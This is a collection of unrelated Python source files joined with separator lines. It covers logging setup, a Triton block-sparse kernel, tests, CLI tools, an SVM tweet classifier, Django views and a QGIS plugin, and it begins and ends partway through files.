# 建议: 在有多个相互关联的文件都需要用到python的日志系统时,不要用默认的root logger。因为所有的名称都会继承root导致重复打印。用logger时一定要起名字!!
logger = getLogger(logger_name)
logger.setLevel(LOGGING_DEBUG)
# 创建一个handler,用于写入日志文件
# fh = LoggingFileHandler(os.path.join(os.getcwd(), './my_log.txt'))
# 通过下面这句话就可以输出中文, encoding='utf-8'
file_handler = handlers.RotatingFileHandler(
filename=log_file_name,
maxBytes=1024 * 1024,
backupCount=5,
encoding='utf-8',)
file_handler.setLevel(file_log_level)
# 再创建一个handler,用于输出到控制台
console_handler = LoggingStreamHandler()
console_handler.setLevel(console_log_level)
# 定义handler的输出格式
_console_formatter = LoggingFormatter(console_formatter)
_file_formatter = LoggingFormatter(file_formatter)
console_handler.setFormatter(_console_formatter)
file_handler.setFormatter(_file_formatter)
# 给logger添加handler
logger.addHandler(console_handler)
logger.addHandler(file_handler)
# 记录一条日志
# logger.info('hello world, i\'m log helper in python, may i help you')
return logger
|
python
|
# Adapted from https://github.com/openai/triton/blob/master/python/triton/ops/blocksparse/softmax.py
import triton.language as tl
import triton
import torch
from src.models.attention.blocksparse_utils import sparsify_broadcast_tensor
def next_power_of_2(n):
n -= 1
n |= n >> 1
n |= n >> 2
n |= n >> 4
n |= n >> 8
n |= n >> 16
n += 1
return n
def num_warps(n):
if n < 512:
return 4
if n < 2048:
return 8
return 16
@triton.heuristics({'num_warps': lambda *args, **meta: num_warps(args[3] * meta['BLOCK'])})
@triton.heuristics({'TN': lambda *args, **meta: next_power_of_2(args[3] * meta['BLOCK'])})
@triton.jit
def _forward(
X, OUT, LUT, sizemax, stride_zx, stride_zout, stride_hout, **meta
):
TN = meta['TN']
BLOCK = meta['BLOCK']
pidhm = tl.program_id(0)
pidz = tl.program_id(1)
# create index ranges
rxm = pidhm % BLOCK
rbm = pidhm // BLOCK
rxn = tl.arange(0, TN) % BLOCK
rbn = tl.arange(0, TN) // BLOCK
# extract information from LUT
header = LUT + rbm * 2
size = tl.load(header + 0)
offset = tl.load(header + 1)
check = rbn < size
rbmn = tl.where(check, rbn, size - 1)
# block id and column id
blockid = tl.load(LUT + offset + rbmn * 4 + 0)
rowid = tl.load(LUT + offset + rbmn * 4 + 2)
headid = tl.load(LUT + offset + rbmn * 4 + 3)
# pointers to X
px = X + pidz * stride_zx + blockid * BLOCK * BLOCK + rxm * BLOCK + rxn
x = tl.load(px, mask=check, other=0)
x = x.to(tl.float32)
# computation
out = tl.sum(x, axis=0)
# pointers to OUT
pout = OUT + pidz * stride_zout + headid * stride_hout + rowid * BLOCK + rxm
tl.store(pout, out)
@triton.heuristics({'num_warps': lambda *args, **meta: num_warps(args[3] * meta['BLOCK'])})
@triton.heuristics({'TN': lambda *args, **meta: next_power_of_2(args[3]) * meta['BLOCK']})
@triton.jit
def _backward(DX, DOUT, LUT, sizemax, stride_zdx, stride_zdout, stride_hdout, **meta):
pidhm = tl.program_id(0)
pidz = tl.program_id(1)
TN = meta['TN']
BLOCK = meta['BLOCK']
# create index ranges
rxm = pidhm % BLOCK
rbm = pidhm // BLOCK
rxn = tl.arange(0, TN) % BLOCK
rbn = tl.arange(0, TN) // BLOCK
# extract information from look-up table
header = LUT + rbm * 2
size = tl.load(header + 0)
offset = tl.load(header + 1)
# bounds checking on lut
check = rbn < size
rbmn = tl.where(check, rbn, size - 1)
# initialize pointers to block-sparse input
blockid = tl.load(LUT + offset + rbmn * 4)
rowid = tl.load(LUT + offset + rbmn * 4 + 2)
headid = tl.load(LUT + offset + rbmn * 4 + 3)
pdx = DX + pidz * stride_zdx + blockid * BLOCK * BLOCK + rxm * BLOCK + rxn
pdout = DOUT + pidz * stride_zdout + headid * stride_hdout + rowid * BLOCK + rxm
# Load
# [2021-09-14] TD: Triton's broadcasting is very buggy, I have to read from dx (which is all
# zeros) just so that I can broadcast dout (a scalar).
dx_zeros = tl.load(pdx, mask=check, other=0)
dout = tl.load(pdout)
# Computation
dx = dout - dx_zeros
tl.store(pdx, dx, mask=check)
class _sum(torch.autograd.Function):
@staticmethod
def make_lut(layout, block, device):
_empty = torch.tensor([], dtype=torch.int64, device=layout.device)
sizes = _empty.clone()
# sizes along rows
for h in range(layout.shape[0]):
sizes = torch.cat((sizes, layout[h, :, :].sum(-1)))
# offsets in block format
offsets = torch.zeros_like(sizes)
offsets[1:] = torch.cumsum(sizes[:-1], dim=0)
# block indices
idx = torch.arange(layout.sum())
head = layout.nonzero(as_tuple=False)[:, 0]
rows = layout.nonzero(as_tuple=False)[:, 1]
columns = layout.nonzero(as_tuple=False)[:, 2]
core = torch.stack((idx, columns, rows, head), dim=1).view(-1)
# construct look-up table
offsets = offsets * 4 + 2 * sizes.numel()
header = torch.stack((sizes, offsets), dim=1).view(-1)
lut = torch.cat((header, core)).type(torch.int32).to(device)
n_head = layout.shape[0]
n_row = layout.shape[1] * block
return lut, int(sizes.max()), n_head, n_row
@staticmethod
def forward(ctx, x, spdims, block, lut, maxlut, n_head, n_row, layout, bench, time):
out = torch.zeros((x.shape[0], n_head, n_row), dtype=x.dtype, device=x.device)
# run kernel
M = x.shape[0]
meta = {'BLOCK': block}
grid = lambda opt: [spdims[0] * spdims[1] * block, M]
_forward[grid](x, out, lut, maxlut, x.stride(0), out.stride(0), out.stride(1),
force_nc_cache=True, **meta)
# save to context
ctx.save_for_backward(x, lut, layout)
ctx.spdims = spdims
ctx.block = block
ctx.maxlut = maxlut
return out
@staticmethod
def backward(ctx, dout):
# retrieve from context
x, lut, layout = ctx.saved_tensors
block = x.shape[-1]
dx = sparsify_broadcast_tensor(dout, layout, block).expand(-1, -1, -1, block)
# dx = torch.zeros_like(x)
# run kernel
# M = x.shape[0]
# grid = lambda opt: [ctx.spdims[0] * ctx.spdims[1] * ctx.block, M]
# _backward[grid](dx, dout, lut, ctx.maxlut, dx.stride(0), dout.stride(0), dout.stride(1),
# force_nc_cache=True, BLOCK=ctx.block)
return dx, None, None, None, None, None, None, None, None, None
class blocksparse_sum:
apply_sum = _sum.apply
def make_lut(self, device):
key = (device, )
if key not in self.lut_cache:
self.lut_cache[key] = _sum.make_lut(self.layout, self.block, device)
return self.lut_cache[key]
def __init__(self, layout, block, bench=False):
self.spdims = layout.shape
self.layout = layout
self.block = block
self.bench = bench
self.lut_cache = dict()
def __call__(self, x):
time_y = [None]
lut, maxlut, n_head, n_row = self.make_lut(x.device)
x = blocksparse_sum.apply_sum(
x, self.spdims, self.block, lut, maxlut, n_head, n_row, self.layout, self.bench, time_y
)
return x
|
python
|
import time
import rich
from hurry.filesize import size
from tabulate import tabulate
class Format:
def __init__(self):
pass
@staticmethod
def cli(**kwargs):
"""
Handle in coming CLI Output Style
"""
if "standard" in kwargs["style"]:
return Format._default(**kwargs)
return "Error"
@classmethod
def _default(cls, **kwargs):
table = []
columns = []
rows = []
if kwargs["source"] == "dict":
columns, rows = cls.__dict(kwargs["data"])
table.append(rows)
elif kwargs["source"] == "list":
for d in kwargs["data"]["response"]:
columns, rows = cls.__list(d)
table.append(rows)
elif kwargs["source"] == "history":
for d in kwargs["data"]["response"]:
__columns, __rows = cls.__history(d)
""" Don't override existing table """
if len(__columns) != 0:
columns = __columns
if len(__rows) != 0:
rows = __rows
table.append(rows)
elif kwargs["source"] == "progress":
for d in kwargs["data"]["response"]:
columns, rows = cls.__progress(d)
table.append(rows)
if len(rows) != 0:
console = rich.get_console()
console.print(
tabulate(
table,
columns,
tablefmt="plain",
stralign="left",
disable_numparse=True,
),
soft_wrap=True,
)
return True
return False
@classmethod
def __dict(cls, data):
columns = []
rows = []
for k, v in data.items():
if k.lower() != "token":
columns.append(k.upper())
rows.append(v)
return columns, rows
@classmethod
def __list(cls, d):
excluded_columns = [
"versions",
"backup_services",
"compatible_error",
]
columns = []
rows = []
for k, v in d.items():
if k not in excluded_columns:
columns.append(k.upper())
if "time" in k:
v = str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(v)))
if "size" in k:
v = str(size(v))
if "percentage" in k:
v = "{}%".format(int(v))
if "_version" in k:
v = str(v)
rows.append(v)
return columns, rows
@classmethod
def __history(cls, d):
included_columns = [
"backup_id",
"start_timestamp",
"status",
"operation",
"id",
"progress_in_percentage",
"description",
"backup_size",
]
columns = []
rows = []
if "PENDING" not in d["status"]:
for k, v in d.items():
if k in included_columns:
columns.append(k.upper())
if "time" in k:
v = str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(v)))
if "size" in k:
v = str(size(v))
if "percentage" in k:
v = "{}%".format(int(v))
rows.append(v)
return columns, rows
@classmethod
def __progress(cls, d):
included_columns = [
"backup_id",
"start_timestamp",
"status",
"operation",
"id",
"progress_in_percentage",
"description",
"backup_size",
]
columns = []
rows = []
for k, v in d.items():
if k in included_columns:
columns.append(k.upper())
if "time" in k:
v = str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(v)))
if "size" in k:
v = str(size(v))
if "percentage" in k:
v = "{}%".format(int(v))
rows.append(v)
return columns, rows
|
python
|
#!/usr/bin/env python2.7
import os
import sys
sys.path.insert(0, os.path.realpath(os.path.join(__file__, '../../../lib')))
import exatest
from exatest.utils import chdir
from exatest import (
useData,
)
class TestParameterized(exatest.TestCase):
@useData((x,) for x in range(10))
def test_parameterized(self, x):
self.assertRowsEqual([(None,)], self.query('select * from dual'))
@useData((x,) for x in range(1000))
def test_large_parameterized(self, x):
self.assertRowsEqual([(None,)], self.query('select * from dual'))
class TestSetUp(exatest.TestCase):
def setUp(self):
self.query('DROP SCHEMA t1 CASCADE', ignore_errors=True)
self.query('CREATE SCHEMA t1')
def test_1(self):
self.query('select * from dual')
def test_2(self):
self.query('select * from dual')
class ODBCTest(exatest.TestCase):
def test_find_odbcini_after_chdir(self):
self.assertTrue(os.path.exists('odbc.ini'))
with chdir('/'):
self.assertFalse(os.path.exists('odbc.ini'))
self.query('select * from dual')
if __name__ == '__main__':
# remove undefined option used in wrapper script
for i in range(len(sys.argv)):
if sys.argv[i].startswith('--jdbc-path='):
# --foo=bar
sys.argv.pop(i)
break
if sys.argv[i].startswith('--jdbc-path'):
# --foo bar
sys.argv.pop(i)
sys.argv.pop(i)
break
exatest.main()
# vim: ts=4:sts=4:sw=4:et:fdm=indent
|
python
|
import sys, getopt
import run
def main(argv):
path_database = ''
path_cnn_trained = ''
path_folder_retrieval = ''
feature_extraction_method = ''
distance = ''
searching_method = ''
number_of_images = 0
list_of_parameters = []
try:
opts, args = getopt.getopt(argv,"hd:c:r:f:s:p:n:m:")
except getopt.GetoptError:
print ('cbir_cl.py -d <path_database> -c <path_cnn_trained> -r <path_folder_retrieval> -f <feature_extraction_method> -s <distance-similarity metric> -n <number_of_images> -m <list_of_parameters>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print ('cbir_cl.py -d <path_database> -c <path_cnn_trained> -r <path_folder_retrieval> -f <feature_extraction_method> -s <distance-similarity metric> -n <number_of_images> -m <list_of_parameters>')
sys.exit()
elif opt == '-d':
path_database = arg
elif opt == '-c':
path_cnn_trained = arg
elif opt == '-r':
path_folder_retrieval = arg
elif opt == '-f':
feature_extraction_method = arg
elif opt == '-s':
distance = arg
elif opt == '-p':
searching_method = arg
elif opt == '-n':
number_of_images = int(float(arg))
elif opt == '-m':
parameters = arg.split(',')
for i in parameters:
list_of_parameters.append(i)
run.run_command_line(path_database,path_folder_retrieval,path_cnn_trained,feature_extraction_method,distance,number_of_images,list_of_parameters)
if __name__ == "__main__":
main(sys.argv[1:])
|
python
|
import sys
import torch
sys.path.insert(0, "../")
from linformer_pytorch import Linformer, Visualizer
model = Linformer(
input_size=512,
channels=16,
dim_k=128,
dim_ff=32,
nhead=4,
depth=3,
activation="relu",
checkpoint_level="C0",
parameter_sharing="layerwise",
k_reduce_by_layer=1,
)
x = torch.randn(1, 512, 16)
y = model(x, visualize=True)
vis = Visualizer(model)
vis.plot_all_heads(title="All P_bar matrices",
show=True,
save_file=None,
figsize=(8,6),
n_limit=256)
print(y) # (1, 512, 16)
|
python
|
from typing import List
class Solution:
def searchInsert(self, nums: List[int], target: int) -> int:
l, r = 0, len(nums) - 1
while l<=r:
m = (l+r)//2
if nums[m]==target:
return m
elif nums[m]>target:
r=m-1
else:
l=m+1
return l
arr= [1,3,5,6]
target = 0
ans = Solution().searchInsert(arr, target)
print(ans)
|
python
|
import heapq
import math
import numpy as np
import nltk.probability
from nltk.classify import SklearnClassifier
from sklearn.svm import SVC
import re
import sys
sys.path.insert(0, '..')
from definitions import *
sys.path.insert(0, '../Wrapper/')
from helper import *
def get_svm_classifier(parameters):
print "Loading training data..."
# A dictionary whose keys are strings (words) and values are tweetclass objects
terms = {}
# Load training data
go_training_data = open(GO_TRAINING_DATA)
go_tweets = []
# Load stop words
sw = open(STOP_WORDS_DATA)
stop_words = {}
for line in sw:
stop_words[line.strip()] = True
# DEBUG
debug_counter = 0
positive_counter = 0
negative_counter = 0
# A debug limit for the number of positive and negative tweets
upto = parameters.upto
negative_counter = 0
positive_counter = 0
for line in go_training_data:
# Parse the line for the classification and the tweet
parts = line.split(",")
score = float(parts[0].replace('"', ""))
if score == 0:
if negative_counter >= upto:
continue
negative_counter = negative_counter + 1
else:
if positive_counter >= upto:
continue
positive_counter = positive_counter + 1
bag = get_words(parts[5], stop_words)
go_tweets.append((score, bag))
# Add all the words in the tweet to the list of all terms
for word in bag:
if word not in terms:
nt = tweetclass(word)
if score == 0:
nt.negative = 1
nt.positive = 0
else:
nt.positive = 1
nt.negative = 0
terms[word] = nt
else:
if score == 0:
terms[word].negative = terms[word].negative + 1
else:
terms[word].positive = terms[word].positive + 1
# Debug
debug_counter = debug_counter + 1
if debug_counter % 1000 == 0:
print "processed %d tweets" % debug_counter
negative_classifications = 0
for (score, bag) in go_tweets:
if score == 0:
negative_classifications = negative_classifications + 1
positive_classifications = len(go_tweets) - negative_classifications
print "Training data loaded!"
# Get the top number of terms
print "Getting top terms from mutual information"
scores = []
top_terms = []
term_limit = parameters.term_limit
heap_terms_processed = 0
for term in terms:
score = get_score(term, positive_classifications, negative_classifications, terms)
# Debug
#print "score: %f\tterm: %s" % (score, term)
if heap_terms_processed % 1000 == 0:
print "heap terms processed: %d" % heap_terms_processed
heapq.heappush(scores, (score, term))
if len(scores) > term_limit:
heapq.heappop(scores)
assert len(scores) <= term_limit
heap_terms_processed = heap_terms_processed + 1
for item in scores:
top_terms.append(item[1])
tt = top_terms
top_terms = {}
for t in tt:
top_terms[t] = True
print "Top terms found"
# Debug
print "Total number of terms: %d" % len(terms)
#assert False
#TODO
# Train
num_features = len(top_terms)
num_samples = len(go_tweets)
#X = np.zeros((num_samples, num_features))
train = []
#y = []
for (score, bag) in go_tweets:
fv = {}
# feature vector for this tweet
for word in bag:
if word in top_terms:
fv[word] = 1
train.append( (fv, score) )
print "Fitting data..."
classifier = SklearnClassifier(SVC(kernel=parameters.kernel, probability=True)).train(train)
return classifier, top_terms, stop_words
|
python
|
# 1-TASK. Matnlardan iborat ro'yxat qabul qilib, ro'yxatdagi har bir matnning birinchi
# harfini katta harfga o'zgatiruvchi funksiya yozing.
def katta_harf(ismlar):
names = []
for i in range(len(ismlar)):
ismlar[i] = ismlar[i].title()
ismlar = ['ali', 'vali', 'hasan', 'husan']
katta_harf(ismlar)
print(ismlar)
# 2-TASK.Yuoqirdagi funksiyani asl ro'yxatni o'zgartirmaydigan va yangi ro'yxat qaytaradigan qilib o'zgartiring
def katta_harf(ismlar):
names = []
while ismlar:
ism = ismlar.pop()
names.append(ism.title())
return names
ismlar = ['ali', 'vali', 'hasan', 'husan']
yangi_ismlar = katta_harf(ismlar[:])
print(ismlar)
print(yangi_ismlar)
|
python
|
import NNRequestHandler.Base
import NNRequestHandler.User
NN_REQUEST_CMD_USER_LOGIN = 1
class DispatchCenter(object):
_instance = None
def __new__(cls, *args, **kwargs):
if not cls._instance:
cls._instance = super(DispatchCenter, cls).__new__(
cls, *args, **kwargs)
return cls._instance
def __init__(self):
self.cache = {}
map = self.commandMap()
for item in map:
for command in item:
self.installHandler(command, item[command])
def commandMap(self):
return [
{NN_REQUEST_CMD_USER_LOGIN : NNRequestHandler.User.LoginHandler}
]
def installHandler(self, command, HandlerClass):
if command <= 0:
raise "Command number less than 0"
if not issubclass(HandlerClass, NNRequestHandler.Base.RequestHandler):
raise "Request handler class must be subclass of RequestHandler"
self.cache[command] = HandlerClass
def dispatch(self, uin, command, body):
if command not in self.cache:
raise "Unknow Command %d" % (command)
handlerClass = self.cache[command]
handler = handlerClass(uin, body)
handler.checkParams()
handler.proccess()
handler.dump()
return (handler.retCode, handler.rspBody)
|
python
|
import unittest
from streamlink.plugins.canlitv import Canlitv, _m3u8_re
class TestPluginCanlitv(unittest.TestCase):
def test_m3u8_re(self):
def test_re(text):
m = _m3u8_re.search(text)
self.assertTrue(m and len(m.group("url")) > 0)
test_re('file: "test" ')
test_re('file:"test"')
test_re('file : "test"')
test_re('file : "test" ')
test_re("file: 'test'")
test_re("file :'test'")
test_re("file : 'test'")
test_re("file : 'test'")
def test_can_handle_url(self):
# should match
self.assertTrue(Canlitv.can_handle_url("http://www.canlitv.plus/channel"))
self.assertTrue(Canlitv.can_handle_url("http://www.canlitv.com/channel"))
self.assertTrue(Canlitv.can_handle_url("http://www.canlitvlive.co/izle/channel.html"))
self.assertTrue(Canlitv.can_handle_url("http://www.canlitvlive.live/izle/channel.html"))
self.assertTrue(Canlitv.can_handle_url("http://www.canlitvlive.io/izle/channel.html"))
self.assertTrue(Canlitv.can_handle_url("http://www.canlitvlive.site/izle/channel.html"))
self.assertTrue(Canlitv.can_handle_url("http://www.ecanlitvizle.net/channel/"))
self.assertTrue(Canlitv.can_handle_url("http://www.ecanlitvizle.net/onizleme.php?kanal=channel"))
self.assertTrue(Canlitv.can_handle_url("http://www.ecanlitvizle.net/tv.php?kanal=channel"))
# shouldn't match
self.assertFalse(Canlitv.can_handle_url("http://www.canlitv.com"))
self.assertFalse(Canlitv.can_handle_url("http://www.canlitv.plus"))
self.assertFalse(Canlitv.can_handle_url("http://www.ecanlitvizle.net"))
self.assertFalse(Canlitv.can_handle_url("http://www.canlitvlive.co"))
self.assertFalse(Canlitv.can_handle_url("http://www.canlitvlive.live"))
self.assertFalse(Canlitv.can_handle_url("http://www.canlitvlive.io"))
self.assertFalse(Canlitv.can_handle_url("http://www.canlitvlive.site"))
self.assertFalse(Canlitv.can_handle_url("http://www.ecanlitvizle.net"))
|
python
|
"""
Open Orchestrator Cloud Radio Access Network
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from django.contrib import messages
from django.shortcuts import get_object_or_404, redirect, render
from operators.models import Operator
from pools.forms import PoolForm, AlertForm, SchedulerForm
from .models import Pool
from ns.models import Ns, Nvf
from bbus.models import Bbu
from scenarios.models import Scenario
from django.contrib.auth.decorators import login_required
from oocran.global_functions import paginator
from ues.models import Ue
from schedulers.models import Scheduler
from .tasks import celery_launch, celery_shut_down
from django.contrib.sites.shortcuts import get_current_site
import uuid
from alerts.models import Alert
@login_required(login_url='/login/')
def list(request):
scenarios = Scenario.objects.filter(operator__user=request.user)
scenarios = paginator(request, scenarios)
context = {
"user": request.user,
"object_list": scenarios,
}
return render(request, "pools/list.html", context)
@login_required(login_url='/login/')
def create(request, id=None):
scenario = get_object_or_404(Scenario, id=id)
form = PoolForm(request.POST or None, request.FILES or None)
if form.is_valid():
try:
Ns.objects.get(operator__user=request.user, name=form.cleaned_data['name'])
messages.success(request, "Name repeated!", extra_tags="alert alert-danger")
except:
ns = form.save(commit=False)
ns.operator = get_object_or_404(Operator, user=request.user)
ns.scenario = scenario
[reply, tag] = ns.create()
messages.success(request, reply, extra_tags=tag)
return redirect("scenarios:scenario", id=id)
if form.errors:
messages.success(request, form.errors, extra_tags="alert alert-danger")
return redirect("scenarios:scenario", id=id)
context = {
"user": request.user,
"form": form,
"scenario": scenario,
}
return render(request, "pools/form.html", context)
@login_required(login_url='/login/')
def delete(request, id=None):
utran = get_object_or_404(Pool, id=id)
id = utran.scenario.id
try:
utran.delete_influxdb_database()
except:
print "database does not exist!"
utran.scenario.total_infras -= 1
utran.scenario.save()
if utran.status == "Running":
celery_shut_down.delay(id, action="delete")
utran.scenario.active_infras -= 1
else:
print "delete"
utran.delete()
messages.success(request, "Pool successfully deleted!", extra_tags="alert alert-success")
return redirect("scenarios:scenario", id=id)
@login_required(login_url='/login/')
def launch(request, id=None):
pool = get_object_or_404(Pool, id=id)
celery_launch.delay(id)
messages.success(request, "Pool successfully Launched!", extra_tags="alert alert-success")
return redirect("pools:details", id=pool.scenario.id)
@login_required(login_url='/login/')
def shut_down(request, id=None):
utran = get_object_or_404(Pool, id=id)
utran.scenario.active_infras -= 1
utran.scenario.save()
celery_shut_down.delay(id)
messages.success(request, "Pool shut down!", extra_tags="alert alert-success")
return redirect("pools:details", id=utran.scenario.id)
@login_required(login_url='/login/')
def details(request, id=None):
pool = get_object_or_404(Pool, id=id)
bbus = Bbu.objects.filter(ns=pool)
ues = Ue.objects.filter(scenario=pool.scenario)
schedulers = Scheduler.objects.filter(ns=pool)
schedulers = paginator(request, schedulers)
alerts = Alert.objects.filter(ns=pool)
alerts = paginator(request, alerts)
context = {
"user": request.user,
"utran": pool,
"ues": ues,
"alerts": alerts,
"bbus": bbus,
"schedulers": schedulers,
"url": get_current_site(request).domain.split(':')[0],
}
return render(request, "pools/detail.html", context)
@login_required(login_url='/login/')
def alert(request, id=None):
utran = get_object_or_404(Pool, id=id)
form = AlertForm(request.POST or None, nvfs=Bbu.objects.filter(ns=utran))
if form.is_valid():
try:
Alert.objects.get(operator__user=request.user, name=form.cleaned_data['name'])
messages.success(request, "Name repeated!", extra_tags="alert alert-danger")
except:
alert = form.save(commit=False)
alert.operator = get_object_or_404(Operator, user=request.user)
alert.scenario = utran.scenario
alert.ns = utran
alert.uuid = uuid.uuid4().hex
alert.save()
for id in form.cleaned_data['nvfs']:
alert.nvfs.add(get_object_or_404(Nvf, id=id))
messages.success(request, "Alert created successfully!", extra_tags="alert alert-success")
return redirect("pools:details", id=utran.id)
if form.errors:
messages.success(request, form.errors, extra_tags="alert alert-danger")
return redirect("pools:details", id=utran.id)
context = {
"user": request.user,
"utran": utran,
"form": form,
}
return render(request, "pools/alert.html", context)
@login_required(login_url='/login/')
def scheduler(request, id=None):
utran = get_object_or_404(Pool, id=id)
form = SchedulerForm(request.POST or None, nvfs=Bbu.objects.filter(ns=utran))
if form.is_valid():
try:
Scheduler.objects.get(operator__user=request.user, name=form.cleaned_data['name'])
messages.success(request, "Name repeated!", extra_tags="alert alert-danger")
except:
scheduler = form.save(commit=False)
scheduler.operator = get_object_or_404(Operator, user=request.user)
scheduler.scenario = utran.scenario
scheduler.type = "nvf"
scheduler.ns = utran
scheduler.save()
for id in form.cleaned_data['nvfs']:
scheduler.nvfs.add(get_object_or_404(Nvf, id=id))
messages.success(request, "Scheduler created successfully!", extra_tags="alert alert-success")
return redirect("pools:details", id=utran.id)
if form.errors:
messages.success(request, form.errors, extra_tags="alert alert-danger")
return redirect("pools:details", id=utran.id)
context = {
"user": request.user,
"utran": utran,
"form": form,
}
return render(request, "pools/scheduler.html", context)
|
python
|
from greent.rosetta import Rosetta
import json
from collections import defaultdict
def setup():
rosetta = Rosetta()
neodriver = rosetta.type_graph.driver;
return neodriver
def dumpem(dtype = 'gene'):
driver = setup()
cypher = f'MATCH (a:{dtype})-[r]-(b) return a,r,b'
with driver.session() as session:
result = session.run(cypher)
records = list(result)
genes = defaultdict(list)
for record in records:
gid = record['a']['id']
edgetype= record['r'].type
other = record['b']['id']
genes[gid].append( {'predicate': edgetype, 'node': other})
with open('genedump.json','w') as outf:
json.dump(genes,outf,indent=4)
if __name__ == '__main__':
dumpem()
|
python
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
GeometryWrapper
A QGIS plugin
Converts geometry longitude from [-180,180] to [0,360]
-------------------
begin : 2017-03-16
git sha : $Format:%H$
copyright : (C) 2017 by Jonah
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt5.QtCore import QFileInfo
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QAction, QFileDialog, QMessageBox
# Initialize Qt resources from file resources.py
from .resources import *
# Import the code for the dialog
from .geometry_wrapper_dialog import GeometryWrapperDialog
import os
from .utils import process_raster_file, process_vector_file
from .utils import process_vector_layer
from qgis.core import QgsRasterLayer, QgsVectorLayer, QgsProject, QgsVectorFileWriter
try:
from qgis.core import QgsMapLayerType
except ImportError:
from qgis.core import QgsMapLayer
QgsMapLayerType = QgsMapLayer.LayerType
class GeometryWrapper:
"""QGIS Plugin Implementation."""
def __init__(self, iface):
"""Constructor.
:param iface: An interface instance that will be passed to this class
which provides the hook by which you can manipulate the QGIS
application at run time.
:type iface: QgsInterface
"""
# Save reference to the QGIS interface
self.iface = iface
# initialize plugin directory
self.plugin_dir = os.path.dirname(__file__)
# Declare instance attributes
self.actions = []
self.menu = u'&Geometry Wrapper'
self.toolbar = self.iface.addToolBar(u'GeometryWrapper')
self.toolbar.setObjectName(u'GeometryWrapper')
# listen for browse button
self.dlg = GeometryWrapperDialog()
self.dlg.input_button.clicked.connect(self.set_in_dataset)
# initialise other variables
self.selected_tab = None
self.input_dataset = None
self.input_layer = None
self.data_type = None
self.longitude_range = None
self.output_file = None
self.output_layer = None
def add_action(
self,
icon_path,
text,
callback,
enabled_flag=True,
add_to_menu=True,
add_to_toolbar=True,
status_tip=None,
whats_this=None,
parent=None):
"""Add a toolbar icon to the toolbar.
:param icon_path: Path to the icon for this action. Can be a resource
path (e.g. ':/plugins/foo/bar.png') or a normal file system path.
:type icon_path: str
:param text: Text that should be shown in menu items for this action.
:type text: str
:param callback: Function to be called when the action is triggered.
:type callback: function
:param enabled_flag: A flag indicating if the action should be enabled
by default. Defaults to True.
:type enabled_flag: bool
:param add_to_menu: Flag indicating whether the action should also
be added to the menu. Defaults to True.
:type add_to_menu: bool
:param add_to_toolbar: Flag indicating whether the action should also
be added to the toolbar. Defaults to True.
:type add_to_toolbar: bool
:param status_tip: Optional text to show in a popup when mouse pointer
hovers over the action.
:type status_tip: str
:param parent: Parent widget for the new action. Defaults None.
:type parent: QWidget
:param whats_this: Optional text to show in the status bar when the
mouse pointer hovers over the action.
:returns: The action that was created. Note that the action is also
added to self.actions list.
:rtype: QAction
"""
# Create the dialog (after translation) and keep reference
icon = QIcon(icon_path)
action = QAction(icon, text, parent)
action.triggered.connect(callback)
action.setEnabled(enabled_flag)
if status_tip is not None:
action.setStatusTip(status_tip)
if whats_this is not None:
action.setWhatsThis(whats_this)
if add_to_toolbar:
self.toolbar.addAction(action)
if add_to_menu:
self.iface.addPluginToMenu(
self.menu,
action)
self.actions.append(action)
return action
def initGui(self):
"""Create the menu entries and toolbar icons inside the QGIS GUI."""
icon_path = os.path.join(self.plugin_dir, "icon.png")
self.add_action(
icon_path,
text=u'Geometry Wrapper',
callback=self.run,
parent=self.iface.mainWindow())
def unload(self):
"""Removes the plugin menu item and icon from QGIS GUI."""
for action in self.actions:
self.iface.removePluginMenu(
u'&Geometry Wrapper',
action)
self.iface.removeToolBarIcon(action)
# remove the toolbar
del self.toolbar
# display file dialog to select input dataset
def set_in_dataset(self):
input_name = QFileDialog.getOpenFileName(None,
'Select input dataset',
'',
"raster or vector (*.shp *.tif)",
)
if input_name:
self.input_dataset = QFileInfo(input_name[0]).absoluteFilePath()
self.dlg.input_dataset.setText(QFileInfo(input_name[0]).absoluteFilePath())
def run(self):
"""Run method that performs all the real work"""
# clear the input_dataset field
self.dlg.input_dataset.clear()
# show the dialog
self.dlg.show()
# set up an empty message box
msg = QMessageBox()
msg.setIcon(QMessageBox.Warning)
msg.setWindowTitle("Geometry Wrapper")
msg.setStandardButtons(QMessageBox.Ok)
# Run the dialog event loop
result = self.dlg.exec_()
# See if OK was pressed
if result:
# set output longitude range
self.longitude_range = 0
if self.dlg.radio_button180.isChecked():
self.longitude_range = '180'
elif self.dlg.radio_button360.isChecked():
self.longitude_range = '360'
# check whether file or layer tab is selected
if self.dlg.file_layer_tab_widget.currentIndex() == 1:
self.selected_tab = "file"
else:
self.selected_tab = "layer"
if self.selected_tab == "file":
# process file
self.data_type = ''
file_name = self.input_dataset
file_info = QFileInfo(self.input_dataset)
raster_layer = QgsRasterLayer(file_name)
vector_layer = QgsVectorLayer(file_name, "ogr")
if raster_layer.isValid():
self.data_type = 'raster'
if not raster_layer.crs().isGeographic():
msg.setText("Input dataset must have geographic coordinate system (such as WGS84)")
msg.exec_()
self.run()
elif vector_layer.isValid():
self.data_type = 'vector'
if not vector_layer.crs().isGeographic():
msg.setText("Input dataset must have geographic coordinate system (such as WGS84)")
msg.exec_()
self.run()
# send data for processing
if self.data_type == 'vector':
self.output_file = self.input_dataset.split(os.extsep)[0] + "_" + str(self.longitude_range) + ".shp"
if os.path.exists(self.output_file):
msg.setText("Cannot overwrite existing file " + os.path.basename(self.output_file))
msg.exec_()
self.run()
else:
vector_layer = process_vector_file(self.input_dataset, self.longitude_range)
writer = QgsVectorFileWriter.writeAsVectorFormat(vector_layer,
self.output_file,
"utf-8",
vector_layer.crs(),
"ESRI Shapefile")
base_name = file_info.baseName() + "_" + str(self.longitude_range)
if self.dlg.add_to_toc.isChecked():
